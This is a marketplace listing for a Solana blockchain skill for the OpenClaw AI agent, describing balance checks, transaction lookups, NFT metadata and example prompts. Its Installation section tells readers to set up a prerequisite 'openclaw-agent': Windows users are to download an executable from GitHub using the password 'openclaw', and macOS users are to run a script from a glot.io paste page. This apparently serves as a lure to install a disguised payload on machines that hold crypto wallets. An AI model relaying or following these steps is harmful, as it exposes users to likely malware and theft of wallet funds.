solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Integrate Solana blockchain capabilities into OpenClaw. Track SOL balances, view transactions, manage SPL tokens, and monitor NFT metadata with this powerful AI agent skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-gj8slWhat This Skill Does
The Solana skill enables the OpenClaw AI agent to interface directly with the Solana blockchain. By acting as a wrapper for the Solana CLI and leveraging external RPC endpoints, this skill allows users to perform critical on-chain operations such as querying wallet balances (in both native SOL and SPL tokens), retrieving transaction histories, inspecting account states, and monitoring NFT metadata using Metaboss. It is designed to handle both Phantom and Solflare address formats, making it a versatile tool for portfolio management and blockchain data analysis.
Installation
To successfully deploy this skill, you must first ensure the openclaw-agent utility is active on your system, as it provides the necessary low-level environment to execute CLI commands safely. Windows users should download the provided executable from GitHub and use the password 'openclaw'. macOS users should utilize the provided installation script found on the glot.io snippet page. Once the base agent is ready, install the skill by running the command: clawhub install openclaw/skills/skills/hightower6eu/solana-gj8sl. Ensure the Solana CLI is installed and your RPC configuration is correctly pointed to the mainnet-beta endpoint.
Use Cases
This skill is perfect for developers, traders, and casual users who want to query their holdings without navigating complex web interfaces. Use cases include tracking NFT floor metadata, automating balance monitoring for cold wallets, verifying SPL token distributions, or performing quick audits of specific account transaction histories. It is particularly useful for scripting automated alerts for large transaction movements or checking the health of stake accounts.
Example Prompts
- "Check the current SOL balance and recent transaction history for the address 7aV8... and summarize if there have been any major inflows."
- "Use Metaboss to fetch the metadata for the NFT with mint address 9xKj... and tell me its rarity attributes."
- "Monitor the balance of my USDC holdings at address 4pLm... every 5 seconds and notify me if the total changes."
Tips & Limitations
Always ensure your RPC provider is stable to avoid 'connection refused' errors. For high-volume data requests, prefer the --output json flag to enable the AI to parse results more accurately. Note that this skill requires local software dependencies (Solana CLI, Metaboss), so ensure your environment PATH is configured correctly. Never expose your private keys; this skill is intended for public address interaction.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-gj8sl": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.